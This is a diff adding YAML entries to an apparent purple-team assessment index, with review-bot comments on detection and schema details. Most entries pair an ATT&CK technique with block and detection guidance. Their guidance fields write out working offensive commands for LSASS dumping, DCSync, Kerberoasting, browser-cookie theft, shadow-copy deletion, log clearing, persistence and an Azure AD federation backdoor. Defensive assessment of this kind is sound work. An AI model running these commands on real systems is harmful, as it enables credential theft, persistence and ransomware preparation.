Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool + - Detect common ransomware extensions using file system telemetry + controls: + - Endpoint Protection + metadata: + id: 72224b97-93d1-4087-8b82-6b4342bf2e09 + tid: T1486 + tactic: TA0040 + x_tools: + - https://github.com/2XXE-SRA/payload_resources/tree/master/coldencryptor + x_vectr_id: 72224b97-93d1-4087-8b82-6b4342bf2e09 + isv: 1 +- name: Delete shadows with vssadmin.exe + description: Delete volume shadow copies on the host to inhibit file system recovery + platforms: + - windows + guidance: + - CMD> vssadmin.exe delete shadows /all /quiet + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry + - Suspicious Volume Shadow Service use detected in the SIEM using telemetry + controls: + - Endpoint Protection + - SIEM + metadata: + id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4 + tid: T1490 + tactic: TA0040 + x_vectr_id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4 + isv: 1 +- name: Modify group policy object + description: Modify a domain group policy object. This can be used for activities like persisting access to the environment, disabling security controls, and executing ransomware on domain systems. 
+ platforms: + guidance: + block: + - '' + detect: + - Configure auditing on group policy objects then look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes + controls: + - SIEM + metadata: + id: 45591791-541b-4a27-bda9-75e6d78a66f4 + tid: T1484.001 + tactic: TA0005 + x_vectr_id: 45591791-541b-4a27-bda9-75e6d78a66f4 + isv: 1 +Execution: +- name: Macro - Remote Template + description: Execute a malicious Office document on the endpoint that will load a macro stored in a remote template document + platforms: + - windows + guidance: + block: + - Macro execution is blocked by GPO policy + - Suspicious process execution/behavior blocked by endpoint security tool + - Payload on disk deleted/quarantined by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry + - Payload on disk triggers an alert with endpoint security tool + controls: + - Endpoint Protection + - Hardening + - SIEM + metadata: + id: a7134d71-dc49-41a8-a309-ec520c96a089 + tid: T1221 + tactic: TA0005 + x_vectr_id: a7134d71-dc49-41a8-a309-ec520c96a089 + isv: 1 +Persistence: +- name: Persist via new scheduled task + description: Persist on a system by creating a new scheduled task + platforms: + - windows + guidance: + - cmd> schtasks.exe /create /sc daily /tn {{ task_name }} /tr {{ command }} /st 20:00 + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool + - Use scheduled task creation events (Event ID 4698) to identify newly created scheduled tasks. Look specifically for events that are anomalous as compared to other task creation events in the environment, such as events where the command is unique across all other tasks and events created by principals that do not commonly create tasks. 
+ controls: + - SIEM + - Endpoint Protection + metadata: + id: 20a6dace-d801-42f5-b659-6cf91e39d273 + tid: T1053.005 + tactic: TA0003 + x_vectr_id: 20a6dace-d801-42f5-b659-6cf91e39d273 + isv: 1 +- name: Persist via new Windows service + description: Persist on a system by creating a new service + platforms: + - windows + guidance: + - CMD> sc create {{ service_name }} binPath= "{{ command }}" + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry + - Use services creation events (Event ID 4697) to identify newly created services. Look specifically for events that are anomalous as compared to other service creation events in the environment, such as events where the command is unique across all other services and events created by principals that do not commonly create services. + controls: + - SIEM + - Endpoint Protection + metadata: + id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737 + tid: T1543.003 + tactic: TA0003 + x_vectr_id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737 + isv: 1 +- name: Persist via Registry Winlogon Shell + description: Run a payload during user login by setting a Registry Winlogon key + platforms: + - windows + guidance: + - CMD> reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /f "{{ command }}" + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool + - Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656). 
+ controls: + - Endpoint Protection + - SIEM + metadata: + id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622 + tid: T1547.004 + tactic: TA0003 + x_vectr_id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622 + isv: 1 +- name: Persist via Registry "Run" key + description: Run a payload during user login and startup by setting a registry run key + platforms: + - windows + guidance: + - CMD> reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "{{ key_name }}" /t REG_SZ /F /D "{{ command }}" + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool + - Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656). + controls: + - Endpoint Protection + - SIEM + metadata: + id: 5dc3f424-8f31-49ee-a822-a77ce20bac43 + tid: T1547.001 + tactic: TA0003 + x_vectr_id: 5dc3f424-8f31-49ee-a822-a77ce20bac43 + isv: 1 +- name: Persist via new local administrator + description: Create a new local user then add them to the "Administrators" group using the builtin net.exe + platforms: + - windows + guidance: + - CMD> net user /add {{ username }} {{ password }} + - CMD> net localgroup administrators {{ username }} /add + block: + - Suspicious process execution/behavior blocked by endpoint security tool + detect: + - Suspicious process execution/behavior detected by endpoint security tool + - Use group modification events (Event ID 4728) to identify additions to local security groups. 
+ controls: + - Endpoint Protection + - SIEM + metadata: + id: 0bcb2080-b140-4a1c-9e79-8512a18882d8 + tid: T1136.001 + tactic: TA0003 + x_vectr_id: 0bcb2080-b140-4a1c-9e79-8512a18882d8 + isv: 1 +- name: Register a new device in Azure AD + description: Register a new device in Azure AD + platforms: + - azuread + guidance: + - PS> Join-AADIntDeviceToAurzeAD -DeviceName {{ name }} -DeviceType "purple" -OSVersion "1" + block: + - 'Prevent users outside of approved groups from being able to register new devices in the tenant. Refer to documentation for details: https://learn.microsoft.com/en-us/azure/active-directory/devices/device-management-azure-portal#configure-device-settings' + detect: + - Detect anomalous device registration events by using Azure audit logs + controls: + - SIEM + - Hardening + metadata: + id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96 + tid: T1098.005 + tactic: TA0003 + x_tools: + - AADInternals + x_references: + - htpts://aadinternals.nom/post/prt/ + x_vectr_id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96 + isv: 1 +- name: Configure a custom federated domain + description: Convert a custom domain in the Azure Active Directory tenant into a federated domain. This can be used for persistent access into the tenant. + platforms: + - azuread + guidance: + - PS> ConvertTo-AADIntBackdoor -AccessToken {{ access_token }} -DomainName "{{ domain }}" + block: + - '' + detect: + - Monitor for unusual domain federation via the SEIM. Examine AAD logs for actions that "Set domain authentication" to "federated". + - https://www.inversecos.com/2021/11/how-to-detect-azure-active-directory.html + controls: + - SIEM + metadata: + id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1 + tid: T1484.002 + tactic: TA0003 + x_tools: + - AADInternals + x_references: + - https://o365blog.com/post/aadbackdoor/ + x_vectr_id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1 + isv: 1 +metadata: + prefix: HI + bundle: Health Index 2024 v1.0 
diff --git a/h-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml b/h-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml
new file mode 100644
index 0000000..d274f20
--- /dev/null
+++ b/h-index-2024/techniques/Collection/804512cc-4acf-4be3-a577-ce02ea723fab.yml
@@ -0,0 +1,19 @@
+name: Screen Capture
+description: Capture an image of the user's screen
+platforms:
+guidance:
+- "implant> {{ screenshot_command }}\nOR \nshell> {{ screenshot_tool }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+metadata:
+ id: 804512cc-4acf-4be3-a577-ce02ea723fab
+ tid: T1113
+ tactic: TA0009
+ x_tools:
+ - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/screenshot.cs
+ x_vectr_id: 804512cc-4acf-4be3-a577-ce02ea723fab
+ isv: 1
diff --git a/h-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml b/h-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml
new file mode 100644
index 0000000..62f850b
--- /dev/null
+++ b/h-index-2024/techniques/Collection/be524cb1-12e6-4708-ad57-faf91dfad9de.yml
@@ -0,0 +1,20 @@
+name: Keylogger
+description: Log user keystrokes
+platforms:
+- windows
+guidance:
+- "implant> {{ keylog_command }}\nOR \nshell> {{ keylog_tool }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+metadata:
+ id: be524cb1-12e6-4708-ad57-faf91dfad9de
+ tid: T1056.001
+ tactic: TA0009
+ x_tools:
+ - https://github.com/2XXE-SRA/payload_resources/blob/master/csharp/keylog.cs
+ x_vectr_id: be524cb1-12e6-4708-ad57-faf91dfad9de
+ isv: 1
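Review bot: `platforms:` in the Screen Capture file is left empty, which YAML parses as null rather than an empty list, while the sibling Keylogger file in this commit lists `- windows`; the linked screenshot.cs tool suggests this entry is Windows-specific too, so `platforms:` followed by `- windows` would keep the two Collection entries consistent. The same empty `platforms:` (and an empty `guidance:`) appears in the CommandandControl files 10f6c44e, 38064494, 3ed2f449 and 9755cd8b; if the schema means "any platform" there, an explicit `platforms: []` makes that intent visible to a consumer that iterates the field instead of handing it a null. Separately, the guidance scalar here and in Keylogger encodes its line breaks as `\n` escapes inside a double-quoted string; a literal block scalar (`- |` followed by the indented lines) reads more clearly and avoids escaping surprises when the template is edited.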
diff --git a/h-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml b/h-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml
new file mode 100644
index 0000000..250d96d
--- /dev/null
+++ b/h-index-2024/techniques/CommandandControl/10f6c44e-b862-4553-bc55-68f6d941bcfb.yml
@@ -0,0 +1,20 @@
+name: Access via remote assistance tool
+description: Establish connection to system using a legitimate remote assistance application
+platforms:
+guidance:
+block:
+- Block the installation and use of unapproved third-party utilities via application control software
+- Connections to known remote access service domains/IPs are blocked
+- Remote access connection attempts originating from users outside of the tenant are blocked
+detect:
+- Connections to known remote access service domains/IPs are detected
+controls:
+- Application Control
+- ID/PS
+- Firewall
+metadata:
+ id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+ tid: T1219
+ tactic: TA0011
+ x_vectr_id: 10f6c44e-b862-4553-bc55-68f6d941bcfb
+ isv: 1
diff --git a/h-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml b/h-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml
new file mode 100644
index 0000000..fa200fe
--- /dev/null
+++ b/h-index-2024/techniques/CommandandControl/38064494-0d58-4f48-bce8-b5b7ea7db3da.yml
@@ -0,0 +1,18 @@
+name: HTTP C2 over tcp/80
+description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTP
+platforms:
+guidance:
+block:
+- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+detect:
+- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+controls:
+- Firewall
+- ID/PS
+- Web Gateway
+metadata:
+ id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+ tid: T1071.001
+ tactic: TA0011
+ x_vectr_id: 38064494-0d58-4f48-bce8-b5b7ea7db3da
+ isv: 1
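Review bot: The block list of the remote assistance entry includes `Remote access connection attempts originating from users outside of the tenant are blocked`, but the detect list has no matching entry, so an environment that logs such attempts without blocking them has nothing to score against; add `- Remote access connection attempts originating from users outside of the tenant are detected` under `detect:`. The block/detect pairs elsewhere in this commit (the C2 and DLP entries, for example) are kept symmetric, so this reads as an omission rather than a deliberate choice. The controls list also names ID/PS and Firewall but not Web Gateway, although a block on known remote-access service domains is usually enforced by a proxy or DNS filter; worth confirming which control the second block line is meant to map to.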
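Review bot: `guidance:` is empty in the HTTP C2 entry, so the file states what the index measures but not how an assessment is expected to exercise it, unlike most other entries in this commit, which carry a command template; the HTTPS C2 (3ed2f449) and Remote tool download (9755cd8b) entries have the same gap. A placeholder in the existing convention, e.g. `- implant> {{ c2_command }}`, or a one-line note that the channel is exercised by the implant's own beaconing, would make the entry self-describing for whoever runs the index. As written, a reader cannot tell whether the empty field is intentional or unfinished.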
diff --git a/h-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml b/h-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml
new file mode 100644
index 0000000..075c765
--- /dev/null
+++ b/h-index-2024/techniques/CommandandControl/3ed2f449-744b-48c3-80d2-854386e446a0.yml
@@ -0,0 +1,18 @@
+name: HTTPS C2 over tcp/443
+description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over HTTPS
+platforms:
+guidance:
+block:
+- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+detect:
+- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+controls:
+- Firewall
+- ID/PS
+- Web Gateway
+metadata:
+ id: 3ed2f449-744b-48c3-80d2-854386e446a0
+ tid: T1071.001
+ tactic: TA0011
+ x_vectr_id: 3ed2f449-744b-48c3-80d2-854386e446a0
+ isv: 1
diff --git a/h-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml b/h-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml
new file mode 100644
index 0000000..ac75a59
--- /dev/null
+++ b/h-index-2024/techniques/CommandandControl/9755cd8b-5212-4331-8c6e-afb27404a4b9.yml
@@ -0,0 +1,18 @@
+name: Remote tool download over HTTP
+description: Download a tool from a public hosting location onto the victim system
+platforms:
+guidance:
+block:
+- Signatures for known-malicious tools/traffic are blocked by network security controls such as an ID/PS
+detect:
+- Signatures for known-malicious tools/traffic are detected by network security controls such as an ID/PS
+controls:
+- Firewall
+- ID/PS
+- Web Gateway
+metadata:
+ id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+ tid: T1105
+ tactic: TA0011
+ x_vectr_id: 9755cd8b-5212-4331-8c6e-afb27404a4b9
+ isv: 1
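Review bot: In the Remote tool download entry, `controls:` lists Web Gateway and Firewall, but both the block and detect lines describe only ID/PS signature matching, so there is nothing in the entry a proxy-based control can be scored against. A detect line grounded in proxy telemetry, e.g. `- Download of executable content from uncategorized or newly-observed domains is detected in web gateway/proxy logs`, would give the Web Gateway control a concrete expectation and also covers tools for which no network signature exists. Signature-only detection is the weaker of the two because a renamed or repacked tool produces no match while the proxy still records the download.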
diff --git a/h-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml b/h-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml
new file mode 100644
index 0000000..12180d9
--- /dev/null
+++ b/h-index-2024/techniques/CredentialAccess/314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml
@@ -0,0 +1,21 @@
+name: Dump LSASS memory using builtin comsvcs.dll
+description: Use rundll32.exe and comsvcs.dll to dump LSASS process memory to disk
+platforms:
+- windows
+guidance:
+- shell> rundll32.exe c:\windows\system32\comsvcs.dll MiniDump {{ lsass_pid }} {{ outpath }} full
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable Credential Guard to prevent traditional process dumping of LSASS
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+controls:
+- SIEM
+- Endpoint Protection
+- Hardening
+metadata:
+ id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+ tid: T1003.001
+ tactic: TA0006
+ x_vectr_id: 314b4f6a-b27a-4a55-af5c-c98bc3146dd8
+ isv: 1
diff --git a/h-index-2024/techniques/CredentialAccess/6efcb4c5-d740-41ce-a0dc-b63734813928.yml b/h-index-2024/techniques/CredentialAccess/6efcb4c5-d740-41ce-a0dc-b63734813928.yml
new file mode 100644
index 0000000..a27e66e
--- /dev/null
+++ b/h-index-2024/techniques/CredentialAccess/6efcb4c5-d740-41ce-a0dc-b63734813928.yml
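Review bot: The detect line for the comsvcs.dll dump says only that the endpoint tool or SIEM alerts "based on telemetry" while SIEM is listed as a control, so the entry gives a SIEM operator no concrete signal to build or validate; the ProcDump and Nanodump entries later on this page have the same gap. All three techniques open a handle to lsass.exe from an unrelated process, so a detect line such as `- Process access to lsass.exe from a non-system process is detected using process-access telemetry (e.g. Sysmon Event ID 10) in the SIEM` states a testable expectation that applies to each of them. The comsvcs variant additionally runs under rundll32.exe, so rundll32.exe invoking comsvcs.dll with a MiniDump argument is an image/command-line pairing that the process-create baseline used elsewhere in this index could key on.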
@@ -0,0 +1,22 @@
+name: Register Security Service Provider (SSP) in LSASS
+description: Register an SSP DLL that into LSASS. This technique can be used by adversaries to harvest credentials that traverse through LSASS.
+platforms:
+- windows
+guidance:
+- shell> {{ ssp_loader }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable the LSA "RunAsPPL" protection to prevent the loading of untrusted DLLs by LSASS
+detect:
+- For SSPs registered permanently, detect modifications to the "Security Packages" key under HKLM\System\CurrentControlSet\Control\LSA\. Additionally look for DLL writes to System32.
+- For temporary SSP loads, detect anomalous module loads by LSASS.exe after establishing a basline for normal module loads
+controls:
+- Endpoint Protection
+metadata:
+ id: 6efcb4c5-d740-41ce-a0dc-b63734813928
+ tid: T1547.005
+ tactic: TA0006
+ x_references:
+ - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package#loading-ssp-without-reboot
+ x_vectr_id: 6efcb4c5-d740-41ce-a0dc-b63734813928
+ isv: 1
diff --git a/h-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml b/h-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml
new file mode 100644
index 0000000..821fcc8
--- /dev/null
+++ b/h-index-2024/techniques/CredentialAccess/79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml
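Review bot: The description is missing a verb (`Register an SSP DLL that into LSASS.`) and the second detect item misspells "baseline" as `basline`; suggested wording `description: Register an SSP DLL so that it is loaded into LSASS. This technique can be used by adversaries to harvest credentials that traverse LSASS.`. The `controls` list contains only `Endpoint Protection`, yet the block list relies on the LSA "RunAsPPL" hardening setting and the detect list relies on registry and image-load telemetry, so `Hardening` and `SIEM` should be listed for consistency with the comsvcs.dll and ProcDump entries, which credit `Hardening` for Credential Guard. It would also help scorers to note in the first detect item that the `Security Packages` value should be compared against a known-good list rather than only watched for change.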
@@ -0,0 +1,25 @@
+name: Dump LSASS memory using Sysinternals ProcDump
+description: Use ProcDump from Sysinternals to dump LSASS process memory
+platforms:
+- windows
+guidance:
+- CMD> procdump -ma lsass.exe dump
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable Credential Guard to prevent traditional process dumping of LSASS
+- Block the installation and use of unapproved third-party utilities via application control software
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+controls:
+- SIEM
+- Endpoint Protection
+- Hardening
+- Application Control
+metadata:
+ id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+ tid: T1003.001
+ tactic: TA0006
+ x_tools:
+ - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
+ x_vectr_id: 79640171-eeb3-44c2-9d9e-cf29c7f57af1
+ isv: 1
diff --git a/h-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml b/h-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml
new file mode 100644
index 0000000..cd0d822
--- /dev/null
+++ b/h-index-2024/techniques/CredentialAccess/8eeb3c12-dc2e-4791-aff5-e81501312886.yml
@@ -0,0 +1,20 @@
+name: Extract Logonpasswords via Nanodump
+description: Use nanodump to extract credentials from LSASS process memory
+platforms:
+- windows
+guidance:
+- cmd> nanodump.exe --duplicate -w {{ out_file }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Enable Credential Guard to prevent traditional process dumping of LSASS
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+- Hardening
+metadata:
+ id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+ tid: T1003.001
+ tactic: TA0006
+ x_vectr_id: 8eeb3c12-dc2e-4791-aff5-e81501312886
+ isv: 1
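Review bot: The Nanodump entry's `controls` list omits `SIEM` and `Application Control` even though it is the same T1003.001 dumping activity as the ProcDump entry directly above, which credits both; a third-party dumper is exactly the case the ProcDump block item "Block the installation and use of unapproved third-party utilities via application control software" covers, so that block item and control should be mirrored here. The name `Extract Logonpasswords via Nanodump` also does not match the description, which says the tool dumps LSASS process memory; `name: Dump LSASS memory using Nanodump` would align it with the sibling entries. Nanodump has no `x_tools` link while ProcDump does, so scorers cannot tell which build the guidance assumes.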
diff --git a/h-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml b/h-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml
new file mode 100644
index 0000000..e5b69b7
--- /dev/null
+++ b/h-index-2024/techniques/CredentialAccess/95790889-fb7d-42af-a221-3535e4197cde.yml
@@ -0,0 +1,22 @@
+name: Extract browser cookies
+description: Extract cookie information from the user's browser
+platforms:
+- windows
+guidance:
+- cmd> SharpChrome.exe cookies
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Suspicious access to database files used by browsers detected using file system telemetry in the SIEM
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 95790889-fb7d-42af-a221-3535e4197cde
+ tid: T1555.003
+ tactic: TA0006
+ x_tools:
+ - https://github.com/GhostPack/SharpDPAPI
+ x_vectr_id: 95790889-fb7d-42af-a221-3535e4197cde
+ isv: 1
diff --git a/h-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml b/h-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml
new file mode 100644
index 0000000..642834a
--- /dev/null
+++ b/h-index-2024/techniques/CredentialAccess/9a66066b-997b-4ff1-8b4b-c14d982df861.yml
@@ -0,0 +1,19 @@
+name: Enabled WDigest via Registry
+description: Set the UseLogonCredential key in the WDigest hive to enable cleartext credential storage in-memory
+platforms:
+- windows
+guidance:
+- cmd> reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
+block:
+- Suspicious Registry modification blocked by endpoint security tool
+detect:
+- Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+ tid: T1112
+ tactic: TA0005
+ x_vectr_id: 9a66066b-997b-4ff1-8b4b-c14d982df861
+ isv: 1
diff --git a/h-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml b/h-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml
new file mode 100644
index 0000000..ff73fb9
--- /dev/null
+++ b/h-index-2024/techniques/CredentialAccess/c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml
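Review bot: The detect item cites Event ID 4656 for registry modification, but 4656 only records that a handle to the object was requested; the event that records the value actually being changed is 4657 ("A registry value was modified"), so the alert should key on 4657 (or Sysmon Event ID 13) and name the `UseLogonCredential` value explicitly rather than the whole Registry. The sentence also has a grammar slip, `when modification are made the Registry`, which should read `when modifications are made to the Registry`, and the description calls WDigest a "hive" when `HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest` is a key within the SYSTEM hive. Finally, the entry sits in the CredentialAccess folder but is tagged `tid: T1112` / `tactic: TA0005`, which describes the registry modification rather than the credential-access goal; if the folder is meant to reflect tactic, this is the one entry in the folder that does not.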
@@ -0,0 +1,20 @@
+name: Volumetric Kerberoasting
+description: Retrieve Kerberos TGS tickets from Active Directory for all users with service principal names (SPNs) set
+platforms:
+guidance:
+- cmd> Rubeus.exe kerberoast
+block:
+- ''
+detect:
+- 'Configure Advanced Audit for Kerberos operations on domain controllers via Group Policy. Using ticket request logs (Event ID 4769), detect suspicious ticket request operations using one or more of the following strategies: 1) Look for a high volume of ticket requests or unique service principals in a short period of time as compared to the typical number of requests by that source. 2) Configure a honey account with a service principal name set then alert when any ticket is requested for that SPN (this requires first configuring a SACL on the account as well as directory service object access auditing via Advanced Audit). 3) Look for downgraded encryption requests where the requested ticket uses RC4 while the target object uses AES (Note: in cases where the account has a weak password, AES tickets can be cracked in a realistic timeframe so attacks may request AES tickets).'
+controls:
+- SIEM
+- Identity Threat Protection
+metadata:
+ id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+ tid: T1558.003
+ tactic: TA0006
+ x_tools:
+ - https://github.com/GhostPack/Rubeus
+ x_vectr_id: c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7
+ isv: 1
diff --git a/h-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml b/h-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml
new file mode 100644
index 0000000..76795bc
--- /dev/null
+++ b/h-index-2024/techniques/CredentialAccess/d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml
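Review bot: The `block` list is the empty placeholder `- ''` even though well-known preventive measures exist for Kerberoasting, so an organization that has done the hardening gets no credit when scoring this entry; suggested items are `- Service accounts with SPNs use long random passwords or group Managed Service Accounts (gMSA) so that offline cracking of TGS tickets is infeasible` and `- Accounts with SPNs are configured for AES-only Kerberos encryption (RC4 disabled)`, with `Hardening` added to `controls`. `platforms:` is empty here although the guidance runs `Rubeus.exe`, a Windows binary, so `- windows` should be listed as in the other CredentialAccess entries. The detect text says "attacks may request AES tickets" where "attackers" is meant.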
@@ -0,0 +1,20 @@
+name: Extract domain user credentials via replication
+description: Replicate a user's hash from a domain controller using replication APIs (DCSync).
+platforms:
+- windows
+guidance:
+- (from workstation) mimikatz> lsadump::dcsync /domain:{{ domain }} /user:{{ user }}
+block:
+- ''
+detect:
+- Enable object logging for directory services via Group Policy Advanced Audit then alert when non-domin controller sources replicate directory objects. Specifically, look for Event ID 4662 events where the action performed was related to replicating object changes (e.g. either/both of "Replicating Directory Changes all" and "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"/"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}")
+- https://blog.blacklanternsecurity.com/p/detecting-dcsync
+controls:
+- SIEM
+- Identity Threat Protection
+metadata:
+ id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+ tid: T1003.006
+ tactic: TA0006
+ x_vectr_id: d6dd145b-c7ae-4f79-bc07-179a012a7a07
+ isv: 1
diff --git a/h-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml b/h-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml
new file mode 100644
index 0000000..8950dd0
--- /dev/null
+++ b/h-index-2024/techniques/DefenseEvasion/16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml
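Review bot: The detect item lists the same GUID twice (`"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"/"{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"`), so whoever writes the 4662 rule from this text will match only the DS-Replication-Get-Changes right and miss the Get-Changes-All right that DCSync actually needs for secrets; the second GUID should be the one for "Replicating Directory Changes All" (the control-access right GUID that differs in the last nibble of the first group — please verify against the AD schema before committing) rather than a copy of the first. The same sentence misspells "non-domain" as `non-domin`. The `block` list is the `- ''` placeholder even though `controls` credits Identity Threat Protection; a block item such as `- Replication rights (DS-Replication-Get-Changes / -All) are restricted to domain controllers and audited for drift` would give hardened environments something to score.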
@@ -0,0 +1,22 @@
+name: Clear Windows Event Log entries
+description: Clear the Windows Event Log entries using the builtin wevtutil.exe to remove any attack indicators in the logs.
+platforms:
+- windows
+guidance:
+- CMD> wevtutil clear-log Security
+- CMD> wevtutil clear-log Application
+- CMD> wevtutil clear-log System
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Suspicious Windows Event Log deletion is detected in the SIEM using Event Log events (Event ID 1102)
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+ tid: T1070.001
+ tactic: TA0005
+ x_vectr_id: 16ed92a3-b979-464b-bc79-fadb43e3c6a1
+ isv: 1
diff --git a/h-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml b/h-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml
new file mode 100644
index 0000000..1194713
--- /dev/null
+++ b/h-index-2024/techniques/DefenseEvasion/2496e250-5757-482f-9661-daea872395ae.yml
